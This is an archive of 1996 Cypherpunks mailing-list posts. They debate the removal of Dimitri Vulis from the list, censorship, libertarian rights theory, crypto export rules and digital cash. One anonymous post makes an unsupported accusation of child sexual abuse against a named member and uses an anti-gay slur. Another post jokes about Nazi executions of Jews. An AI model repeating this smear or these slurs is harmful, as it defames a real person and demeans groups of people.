> >     his own resources, then there would have been a loss of
> >     freedom with dangerous implications for us all. 
> 
> No one is suggesting to overrule him. It is an attempt to persuade him.
> Your point is lost.

Perhaps Igor did not understand my point, or I did not make 
myself clear enough.  I was illustrating the only way someone's 
freedom could be lost given the current controversy.  

Ironically, giving Dimitri the boot has benefited the Cypherpunk
list in at least two ways.  It has vastly lowered the level of
ugly flames and personal attacks.  It has also provided us with 
a wonderful opportunity to explore such concepts as censorship,
freedom, rights and property.  I much prefer it when this list
is a forum for ideas rather than a outlet for spoiled tantrums
by the emotionally challenged.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Matthew J. Miszewski" <mjmiski@execpc.com>
Date: Tue, 5 Nov 1996 08:09:35 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Copyright violations
Message-ID: <199611051609.KAA05346@mail.execpc.com>
MIME-Version: 1.0
Content-Type: text/plain


>>  American Banker: Thursday, October 31, 1996
>  
> Two Retail Giants Sue Visa Over Debit Cards 
>  
> By LISA FICKENSCHER
>  
> Two of the largest retailing companies have filed a lawsuit against Visa
> U.S.A., claiming the bank card association illegally forces merchants to
> accept debit cards. 

(major snip)

This is the first step towards repudiation of real electronic cash.  
I am not in favor of "forcing" companies to act (BTW, they are not 
forced to do anything, they can choose not to accept Visa), but if 
Visa will go to bat to support their debit cards, they may be willing 
to support ecash the same way.

Matt 
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAzDq+FoAAAEEANM9+JcJmUp4aCSGpdOG4Y1b6m4630XA8H41Utbvr7Tr6wEH
CD6tlxZ+k+Pycj4w/f8WQa8fC50skoLjUNeP4lYsR7NYaMGRp6WkqCLMI/3Nohvk
pfLDqnzZZdwVL2liB7mfTURoF6doQaVehHmMBjSaVTfD12tzNGm6VvyEc77JAAUR
tClNYXR0aGV3IEouIE1pc3pld3NraSA8bWptaXNraUBleGVjcGMuY29tPg==
=lkx1
-----END PGP PUBLIC KEY BLOCK-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <bryce@digicash.com>
Date: Tue, 5 Nov 1996 01:10:00 -0800 (PST)
To: Hallam-Baker <hallam@ai.mit.edu>
Subject: [NOISE] Re: Dr. Vulis
In-Reply-To: <327ECAC8.2781@ai.mit.edu>
Message-ID: <199611050909.KAA00731@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

 A million monkeys operating under the pseudonuym "Hallam-Baker
 <hallam@ai.mit.edu>" typed:
>
> Of course John was right to give Vilus the boot. Cypherpunks is a club
> and like many private clubs occasionaly finds it necessary to give some
> oik the boot.


Yeah!  That was GREAT!  Now let's ban Dr. Hallam-Baker!  He's
always pissing off the libertarianpunks and causing
flamewars...


> And of course this is not an action that can be strictly justified in
> terms of absolute rights which many are fond of prating on about.  
> Rights are limited, as Mills observes they are a product of law. Society 
> finds it necessary to enact laws to protect rights. Dmitri's posts were
> affecting other people's right to speak. There is thus the traditional
> liberal conflict, that of having to infringe rights to protect them.


Dear Sir:  I humbly put it to you that the above reflects a 
misunderstanding about the libertarian conception of "absolute
rights".  I personally do _not_ subscribe to said theory, but 
I try to understand a thing correctly before criticizing it in 
public.


> If libertarians would read "on Liberty" rather than using it like
> a magic charm they would know that the main theory it advances is of
> the *balance* between the rights of communities and the rights of
> individuals. 


I have read (parts of) _On_Liberty_, and as I recall it was
adamant in an ("unbalanced") defense of absolute rights of
individuals.  The only exception I remember is an unexplored
comment on rights-violations of ommission counting as well as
rights-violations of commission.  (E.g. if you see a drowning
man and you fail to save him you are violating his rights.)  
Perhaps that is what you see as "balance between the rights of
communities and the rights of individuals"?  Or perhaps the
book goes into detail on that subject in a part that I didn't 
read.  Again I ask not because I have a particular ideological
axe to grind here, but because I seek accuracy in public
dialogue.


Regards,

Bryce




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.1b2

iQB1AwUBMn8EXkjbHy8sKZitAQGWJQL+JzzPf0NOovQ3hZpEsim6wzz9OIWetfX4
ZQM7SYZkvNMQOX7QkShj0PXE+xtD+Vw513ENJwrzw5Y9hqRYr2P53dk10h7ovWth
egHhGYGB5YhZ4H2BQrA0FB+7y1F/9RDG
=wjM8
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 5 Nov 1996 08:46:45 -0800 (PST)
To: cypherpunks@toad.com
Subject: US Exit Tax Wrapup in Forbes
Message-ID: <3.0b19.32.19961105113141.0071fb08@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


The current Forbes has a good short article wrapping up the status of the
"taxpatriate" control movement in Congress.

The Health Care Bill that passed in August didn't include an Exit Tax as
previously reported.  What it did contain was a provision that states that
taxpatriates with a net worth of more than $500K who renounce their
citizenship will still be on the hook for ten years for income taxes on
their US source income.  This provision is easily dodged however by tax
planning techniques that assure that the individual involved has no US
source income.  Borrowing and trusts can be substituted for an income stream.

The second provision was in the immigration bill.  It subjects all those
who renounce their US citizenship (for any reason) to a visa requirement
for entry to the US.  State can then deny visas in cases where the expat is
a taxpat.  This applies to new citizens of those OECD countries that have
visa-free entry to the US.  How State will filter recent expats out of the
flow for special treatment is unclear, however.  Nation of birth is shown
on passports, so that might be able to be used.  This gimmick is also
easily dodged by entry into Canada or Mexico with a low profile border
crossing into the US.

Gee, I wish I had enough assets to become a taxpatriate.

DCF

"Vote for the only Swiss Citizen in the Presidential race -- Harry Browne."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Tue, 5 Nov 1996 11:44:16 -0800 (PST)
To: cypherpunks@toad.com
Subject: "Fortune" article on crypto
Message-ID: <v03007800aea547163a07@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



Wading through 150 or more messages from while I was away (a huge fraction
of them either about or from Vulis), I didn't see mention of the long
article on crypto, export issues, RSADSI, Bidzos, the NSA, etc., in the
current issue of "Fortune" magazine, 11 November.

One think caught my eye, though I haven't finished reading the whole thing.

"Bidzos professes what seems sincere respect for the spy agency--several of
its former staffers even work for him. But he insists that it needs a
gadfly: "I've gone there a few times and listened to their dark-side folks.
I always come out feeling that I'm a traitor. I deserve to die. I'm causing
the early demise of society and should just scuttle the company, But an
hour after I leave the agency, my head clears and I think, "Okay, back to
reality.""

This echoes the feeling I often have (though I have never been given the
"If you knew what we know" spiel, though I have a vivid imagination and
have known for the last half-dozen years what the implications of strong
and untraceable crypto implies). That is, I understand the role of the NSA
and the longterm "threats" strong crypto implies.

(I avoid blather about how all it is useful for is to protect the
democratic and privacy rights of citizen-units. That's comforting twaddle,
popular with some journalists and some namby pamby privacy advocates. In
fact, strong crypto is a tool for deconstructing and demolishing democratic
institutions, which is why I support it. Obviously. Yes, I sometimes get
concerned about the lives which will be affected, but, ultimately, the
ubermensch must do what he must do, regardless of how some in the herd are
affected.)

Also Sprach Tim,


"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Tue, 5 Nov 1996 12:12:14 -0800 (PST)
To: ichudov@algebra.com
Subject: Re: Dr. Vulis is not on cypherpunks any more
In-Reply-To: <199611051558.JAA08995@manifold.algebra.com>
Message-ID: <Pine.SUN.3.91.961105115311.17274A-100000@crl.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Tue, 5 Nov 1996 ichudov@algebra.com wrote:

> Sandy Sandfort wrote:
> > The core basis of libertarianism, the non-aggression principle,
> > is usually expressed something like this:
> > 
> > "No one has the right to initiate force for fraud against another."
> > 
> > Perhaps Paul would be so kind as to tell us how he believes John 
> > has violated this standard.
> > 
> 
> Unsubscribed him by force?

Obviously not, unless one wishes to completely distort the 
meaning of the word.  The /reducto ad absurdum/ implied by 
Igor's question would say that when a volunteer stopped 
volunteering his services, he was initiating force against his
former beneficiaries.


 S a n d y

	"English, it's not just for school anymore."

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Anonymous)
Date: Tue, 5 Nov 1996 03:02:37 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Digital signatures
Message-ID: <199611051102.MAA22021@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Tim May is not only as queer as a three dollar bill, but he is also into having 
sex with children.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Tue, 5 Nov 1996 12:25:26 -0800 (PST)
To: hallam@ai.mit.edu
Subject: Re: Dr. Vulis
In-Reply-To: <9611051854.AA09590@etna.ai.mit.edu>
Message-ID: <Pine.SUN.3.91.961105120912.17274B-100000@crl.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Tue, 5 Nov 1996 hallam@ai.mit.edu wrote:

> 
> >> ...as Mills observes [rights] are a product of law.  Society
> >> finds it necessary to enact laws to protect rights...

I responded:

> >Logically, you can't have it both ways.  Which is it?

To which Phill alleged:
 
> Both sentences say the same thing. Society enacts laws which
> provide protections to the individual. As a result of these
> protections the individual has rights.

Unfortunately, both sentences, as originally written, DO NOT
say the same thing.  They are recursive in the extreme.  

"Society enacts laws which provide protections to the individual"
is not the logical equivalent of "Society finds it necessary to 
enact laws to protect rights" unless rights exist prior to the
enactment of laws.  

Maybe Phill should just say he misspoke himself rather then go
through his elaborate back-and-fill charade.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Three Blind Mice <3bmice@nym.alias.net>
Date: Tue, 5 Nov 1996 09:27:03 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: AOL /  CyberPromo email blocking
Message-ID: <199611051726.MAA09978@anon.lcs.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


This was in the Daily Brief on 11/05:

* A federal Judge ruled yesterday that America Online can block
  junk e-mail from Cyber Promotions Inc.
    - said neither the First Amendment nor the constitutions of
      Pennsylvania or Virginia allow Cyber to send unsolicited
      computer ads to AOL members.

Does anybody know where I can find a full article on this?  It sounds like
it might set some precedent for other cases dealing with the Internet.

Thanks,
--3bmice





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Tue, 5 Nov 1996 12:35:43 -0800 (PST)
To: Cypherpunks <cypherpunks@toad.com>
Subject: HAPPY GUY FAWKES DAY!
Message-ID: <Pine.SUN.3.91.961105123056.18719A-100000@crl.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On this day in 1605 the Gunpowder Plot was foiled.  Guy Fawkes
and his compatriots had intended to blow up Parliment.

The English celebrate it because Guy Fawkes failed.

I celebrate it because he tried.  :-)


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
	




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kb4vwa@juno.com (Edward R. Figueroa)
Date: Tue, 5 Nov 1996 10:13:35 -0800 (PST)
To: cypherpunks@toad.com
Subject: Information
Message-ID: <19961105.131710.5207.1.kb4vwa@juno.com>
MIME-Version: 1.0
Content-Type: text/plain


I'm a new Cyberpunk!   

I apologized if this is not the place to post this message request.

I have some interesting projects and questions for the Cyberpunk world.

I would like to know if there is any Cyberpunks in S. Florida (Miami) who
could converse with me about Crypto?   I am very interested in making new
Cyberpunk friends, meeting places,  etc.., or please send me E-mail.

I would like to know where to place my Public Key?   Note, I only have
E-mail access at this time, and not the Net access, but could have a
friend place the key for me.

Last,  I would like to know once and for all,  is PGP compromised,  is
there a back door, and have we been fooled by NSA to believe it's
secure?

Ed - 

kb4vwa@juno.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: droelke@rdxsunhost.aud.alcatel.com (Daniel R. Oelke)
Date: Tue, 5 Nov 1996 11:36:02 -0800 (PST)
To: coderpunks@toad.com
Subject: Re: URG_ent
Message-ID: <9611051935.AA04338@spirit.aud.alcatel.com>
MIME-Version: 1.0
Content-Type: text/plain




Not to beat up on Medcom - but doesn't this sound like a
nice DES cracking target?

> 
>  "Medcom introduces a "Super Cafe" data encryption product"
> 
>     Medcom's latest data encryption product, the Secure Socket 
>     Relay (SSR), features strong encryption with full key length 
>     (56-bits DES). A demo version can be downloaded at
>     http://www.medcom.se/.
> 
> 
------------------------------------------------------------------
Dan Oelke                                  Alcatel Network Systems
droelke@aud.alcatel.com                             Richardson, TX





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@ai.mit.edu
Date: Tue, 5 Nov 1996 10:49:08 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Dr. Vulis
In-Reply-To: <Pine.SUN.3.91.961105090921.9423B-100000@crl.crl.com>
Message-ID: <9611051854.AA09590@etna.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



>> ...as Mills observes [rights] are a product of law.  Society
>> finds it necessary to enact laws to protect rights...

>Logically, you can't have it both ways.  Which is it?

Both sentences say the same thing. Society enacts laws which
provide protections to the individual. As a result of these
protections the individual has rights.

The decision to enact laws may be affected by a consensus 
in society concerning which rights are desirable. But this
does not affect the fact that the realisation of rights is
a through society and law.

If you like you could replace the word "protect" with "create"
but most laws enacted don't create rights, rather they continue
to preserve previously granted rights which are under threat.


And then you get the type of laws which Bod Dole so ardently 
fought for such as special favours to Archer Daniel Midlands,
the Kansas Argi-business which recently paid a $100 million
corruption fine. Of course power can be exercised in a corrupt
fashion.

If you admit that rights are simply abstract conclusions from
a wider arguement based in more fundamental principles then
there is some purpose to the discussion. Otherwise the argument
is simply a stale restatement of the axioms as the conclusion.


If we return to the original basis on which Mill opposed censorship
its not hard to find out why Dimitri is denied his support. The
argument is based on the need to keep alive debate. Dimitri wants
to prevent debate, he does not wish to meet with the argument,
he merely wishes to indulge in character assasinations and insults.


		Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pcw@access.digex.net (Peter Wayner)
Date: Tue, 5 Nov 1996 11:30:15 -0800 (PST)
To: cypherpunks@toad.com
Subject: Announcement-- Reward for Errors...
Message-ID: <v02140b05aea54176c8ec@[199.125.128.5]>
MIME-Version: 1.0
Content-Type: text/plain



At this moment, I'm preparing the second edition of my book
_Digital Cash_. In order to reduce the errors and improve the
book, I'm announcing rewards of $10.00 per technical error to
the first person to report each particular error to me. They
will also receive a personal mention in the thanks given at the
front of the book if they don't want to remain anonymous.

Naturally, I need to limit this offer. All awards are subject to
my whims. Errors in grammar and spelling are not eligible. I
will make the decision of which person is the first to make a
bug report. If something seems more like a feature than a bug, I
may not pay a reward. Also, I am free to decide upon the basic
granularity of the errors. My decision is final, but I hope to
be as inclusive as possible to reward people who take the time
to write. I want to be as generous as my pocketbook allows. If
this works out well, the second edition will sell more books
which will allow me to offer even larger rewards when I prepare
the third edition.

I'm also asking that people forward any suggestions for
additional topics to me. A copy of the table of contents can be
found on my web page
(http://www.access.digex.net/~pcw/pcwpage.html).  If you're a
company or a researcher with an interesting contribution to the
world of digital transactions, please write. I want to be as
inclusive as possible.


My thanks to everyone who takes the time to consider this offer.

The offer is in effect for a limited period of time and may be
withdrawn at any time. See my web page for announcements.

-Peter Wayner
pcw@access.digex.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Tue, 5 Nov 1996 14:35:04 -0800 (PST)
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: Dr. Vulis
Message-ID: <Pine.SUN.3.91.961105143024.24101B-100000@crl.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,


On Tue, 5 Nov 1996 Phill wrote:

> Of course the two sentences don't say exactly the same thing, 
> otherwise I would have written one.

That never stopped academics before.
 
> I don't think we have a problem with the statements conflicting,
> there is an interaction. What a Hegelian would call dilectic. 
> I prefer to use a different term for much the same reasons as
> Sorros, the misuse of the term has created garbage that one
> does not want to associate with (eg Historical materialism). 

Please eschew the obfuscation.  The sentences Phill hastely wrote
are simply contradictory.  It's fatuous to claim, after the fact,
that he intended some sort of dialectic (i.e., a system of 
arguement in which conflicting ideas are resolved).

Intellectual honesty isn't required on this list, but it is
appreciated.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sean Roach <roach_s@alph.swosu.edu>
Date: Tue, 5 Nov 1996 14:44:17 -0800 (PST)
To: cypherpunks@toad.com
Subject: [rant] Re: Censorship on cypherpunks
Message-ID: <199611052244.OAA15338@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


>
>Obviously many voluntary religious organizations have quite strict rules
>for their members and are compatible with libertarianism.  Government
>monopoly regulations that cannot be opted out of are not compatible with
>libertarianism. 

May I remind you that if you want to leave this country, all you have to do
is board a plane.  Many people have suggested similar things about various
groups for about two centuries.  The major difference between this list and
this government is that it is easier to start a new list.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sean Roach <roach_s@alph.swosu.edu>
Date: Tue, 5 Nov 1996 14:44:27 -0800 (PST)
To: cypherpunks@toad.com
Subject: [noise] Re: Sliderules, Logs, and Prodigies
Message-ID: <199611052244.OAA15345@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Peter Trei wrote:
>
>When I was in high school, slide rules and log tables were standard
>equipment - calculators started to come in towards the end. There
>was a *lot* of controversy over their use in exams, and in homework
>('show your working...'). At one point, you could use a calculator, but
>only if you noted the fact (and model) on your exam paper.

If I remember my history right, the order that math was done often depended
on the model of calculator it was done on.  I remember being warned as late
as 1991 how some calculators may still still add before they multiply, and
to use those parenthesis for good measure, just to be safe.

>I still treasure one of the heirlooms from my grandfather - a 12
>inch bamboo rule, with his name carefully engraved in engineering
>lettering ( which he used during his 50+ years at Ma Bell).

I know where there used to be a basic model slide rule that spans about 10
feet, it was mounted on the wall of the math room where I spent junior high.
My dad actually taught me basic arithemetic on it.  (Ironically, on the
opposite wall were the computers, an Apple IIe, a Commodore 64, two
TI99/4a's and about 4 Tandy 1000/tx's, this did all take place before 1989)

Sean Roach





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 5 Nov 1996 13:42:33 -0800 (PST)
To: cypherpunks@toad.com
Subject: RE: Dr. Vulis please read this.
In-Reply-To: <c=GB%a=_%p=CHEMSON%l=CSH_NT0-961105160508Z-3739@csa-ntx.chemson.com>
Message-ID: <DiRXwD1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Butler, Scott" <SButler@chemson.com> writes:

> Dr. Dimitri Vulis  (KOTM)
> 
> Do you think that it would be possible for you to leave this mailing
> list quietly WITHOUT sending mail to it again unless you have anything
> that may be found interesting / useful regarding cryptography.

Thank you, Scott, for your advice, which reminds me of the following story:

One day the Germans were about to shoot two Jews, named Abram and Moisha. 
The Germans offered the Jews blindfolds. Abram bravely declined, to which
Moisha said: "Take it, Abram, don't make trouble!"

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Crocker <dcrocker@brandenburg.com>
Date: Tue, 5 Nov 1996 23:07:48 -0800 (PST)
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: Dr. Vulis is not on cypherpunks any more
In-Reply-To: <847122169.8851.0@fatmans.demon.co.uk>
Message-ID: <v0310061baea578d1263f@[205.214.160.146]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:42 PM -0500 11/4/96, Sandy Sandfort wrote:
>Granted, but neither is it a requirement to suffer fools.

	Actually I think that this view is at the core of the misunderstanding.

	In fact, we ARE required to suffer fools.  It is a clear and
acknowledged expense for an open society.

	This does not mean that we have to encourage them.  For example,
it's just fine to make a point of never responding to any mail from someone
you happen to consider a fool.  If enough list participants happen to
concur with your assessment, a de facto state of ostracism results.

	We need to acknowledge the responsibility we each carry for
encouraging continued activity by those we simultaneously assess as fools
(or worse.)

	Involuntary list membership termination is a fundamental error.

d/

--------------------
Dave Crocker                                             +1 408 246 8253
Brandenburg Consulting                              fax: +1 408 249 6205
675 Spruce Dr.                                  dcrocker@brandenburg.com
Sunnyvale CA 94086 USA                        http://www.brandenburg.com

Internet Mail Consortium                http://www.imc.org, info@imc.org






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ernest Hua <hua@chromatic.com>
Date: Tue, 5 Nov 1996 15:17:03 -0800 (PST)
To: cypherpunks@toad.com
Subject: News: Europe Wants Stronger Encryption
Message-ID: <199611052315.PAA12733@ohio.chromatic.com>
MIME-Version: 1.0
Content-Type: text/plain


>From C/Net News (http://www.news.com/News/Item/0,4,5076,00.html):

    Europe wants stronger encryption 
    By Alex Lash
    November 5, 1996, 5:30 a.m. PT 

    The European Electronic Messaging Association has told
    the European Commission that European companies are at a
    competitive disadvantage without access to strong
    American-made cryptography, according to the
    organization. 

    ....




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 5 Nov 1996 15:30:20 -0800 (PST)
To: cypherpunks@toad.com
Subject: "censorship in cyberspace"???
Message-ID: <199611052329.PAA15991@netcom22.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



I don't understand why people rant so much about censorship
in cyberspace, given the ease of buying a new tentacle.
a long time ago getting a new internet account was a big
deal, but now they are as prolific as flies.
you can now buy them for $7/mo from Community Connections,
courtesy of another cypherpunk (Sameer Parekh) on this list.
you even get a 5mb web site at this price, as I understand it.

I'd be interested in hearing of any other "tentacle havens" 
out there if anyone has any comment. <g>

my main point is that it's merely a semantic concept to say
that someone is "censored" from a mailing list. it's not
really possible to do such a thing anymore given how easy
it is to get new internet account with no ID necessary.
you can fight it or you can surf on it!! it's quite ironic
that to have the ability for a moderator to have a 
"civilized" forum with a guaranteed ability to obstruct
certain individuals, would require what cpunks would consider
an orwellian identification system. (tying a human to their
cyberspace posts. it could be done.)


p.s. one of these days I wonder if someone is going to mount
a really concerted attack against a mailing list using a
full tentacle arsenal instead of only a single email address
or anonymous remailers, just for the kicks of it.

the "automatic prose generator" technology out there leaves a lot
of other interesting ideas. an ingenious software engineer
with a flair for writing could create some pretty sophisticated
grammars that automatically generate text yet are impossible
to detect over perhaps even dozens of messages output by them.
they could even have their own personalities and writing styles,
if the software engineer were creative and devious enough.

 it's just a matter of time, and
really every mailing list in the world is defenseless against
it. does anyone have a technical solution? you'd solve one
of mankinds most pressing and difficult problems ever
encountered: "spam".

on the other hand, maybe such a thing has already happened
and no one knows about it. or maybe its happening right
now on this list. it would be absolutely impossible to detect
in all the typical noise if the "graffiti artist" were crafty enough.
 (hee, hee)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 5 Nov 1996 15:46:26 -0800 (PST)
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: "Fortune" article on crypto
In-Reply-To: <v03007800aea547163a07@[207.167.93.63]>
Message-ID: <199611052345.PAA18414@netcom22.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>
>(I avoid blather about how all it is useful for is to protect the
>democratic and privacy rights of citizen-units. That's comforting twaddle,
>popular with some journalists and some namby pamby privacy advocates. In
>fact, strong crypto is a tool for deconstructing and demolishing democratic
>institutions, which is why I support it. Obviously. Yes, I sometimes get
>concerned about the lives which will be affected, but, ultimately, the
>ubermensch must do what he must do, regardless of how some in the herd are
>affected.)

as usual, you skip the most interesting part. please elaborate on
why you are interested in "deconstructing and demolishing democratic
institutions". are you opposed ot democracy? do you support the 
constitution? it would be strange for you to say you agree with
the constitution but are opposed to democracy. apparently you
agree with anything that limits a government but nothing that
creates one? 

ok, so you've argued against police as a legitimate part of government
before as I recall (advocating, as other here, things like "private"
security forces etc.), so I won't get into that.

well, then, do you think there is a legitimate role for a legal system?

if not, how do you propose settling disputes in a civilized manner
other than "he with the biggest bazooka wins"?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Tue, 5 Nov 1996 12:52:04 -0800 (PST)
To: ses@tipper.oit.unc.edu (Simon Spero)
Subject: Re: British Telecom merger with MCI
In-Reply-To: <Pine.SUN.3.91.961105090403.5329B-100000@tipper.oit.unc.edu>
Message-ID: <199611052048.PAA01743@homeport.org>
MIME-Version: 1.0
Content-Type: text


Can you offer up examples of 3des export?  Demonstrating that the law
is arbitrarily enforced would probably be a big, big win on the 1st
ammendment grounds.  They can't censor Phil and not censor Stew Baker
for the same speech.

Adam


Simon Spero wrote:

| > Phil Karn failed to get an export license for 3des for foriegn offices
| > of Qualcomm, staffed by Americans.  See
| > www.eff.org/pub/Crypto/ITAR_export/nsa_3des_export_denial_0396.letter 
| 
| [whoops] 
| That's unusual - certainly, for the bigger companies it seems to be pretty
| automatic, especially for NATO countries. Of course, it could just be that 
| Phil is "known to the authorities". 
| 


-- 
Celebrate Guy Fawkes day.  Send a revolutionary to Congress.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@ai.mit.edu
Date: Tue, 5 Nov 1996 12:43:14 -0800 (PST)
To: sandfort@crl.com
Subject: Re: Dr. Vulis
In-Reply-To: <Pine.SUN.3.91.961105120912.17274B-100000@crl.crl.com>
Message-ID: <9611052049.AA09638@etna.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



>> Both sentences say the same thing. Society enacts laws which
>> provide protections to the individual. As a result of these
>> protections the individual has rights.

>Unfortunately, both sentences, as originally written, DO NOT
>say the same thing.  They are recursive in the extreme.  

They are mutually recursive but the types of the relations are 
different.

Laws create rights	- argument in "is"
=> Should create good laws to protect valid rights.
			- argument in "ought"

Of course the two sentences don't say exactly the same thing, 
otherwise I would have written one.

If law did not have the potential to create rights there  would
not be the same duty of care for law creators.

>Maybe Phill should just say he misspoke himself rather then go
>through his elaborate back-and-fill charade.

I'll tell you what, ill admit that my original statement was
not of the clarity that I would ideally wish to achieve. But
I don't think that we need apply the criteria of a journal article
here. :-)

I don't think we have a problem with the statements conflicting,
there is an interaction. What a Hegelian would call dilectic. 
I prefer to use a different term for much the same reasons as
Sorros, the misuse of the term has created garbage that one
does not want to associate with (eg Historical materialism). 


		Phill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbugden@smtplink.alis.ca
Date: Tue, 5 Nov 1996 13:02:07 -0800 (PST)
Subject: RE: Dr. Vulis
Message-ID: <9610058472.AA847238509@smtplink.alis.ca>
MIME-Version: 1.0
Content-Type: text/plain



Hallam-Baker <hallam@ai.mit.edu> wrote:
> the main theory [Mill's book _On_Liberty_] advances is of the *balance*
> between the rights of communities and the rights of individuals. 

Two words: Schelling Point.

James





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rcgraves@ix.netcom.com>
Date: Tue, 5 Nov 1996 13:42:48 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: [NOISE] If the shoe fits, wear it [VULIS]
Message-ID: <199611052140.QAA09882@spirit.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Dr.Dimitri Vulis KOTM wrote:
> 
> I've pointed out already that apparently John is not, so far,
> filtering out my submissions to the c-punks list.

Correct. It's just a formal way of saying you're unwelcome, really. 
Shoo.

> However I'd like to take exception with the two claims made in
> the articles cc'd to me so far:
> 
> A that only governments can censor;
> 
> B that post-factum punishment for "inappropriate" speech is not
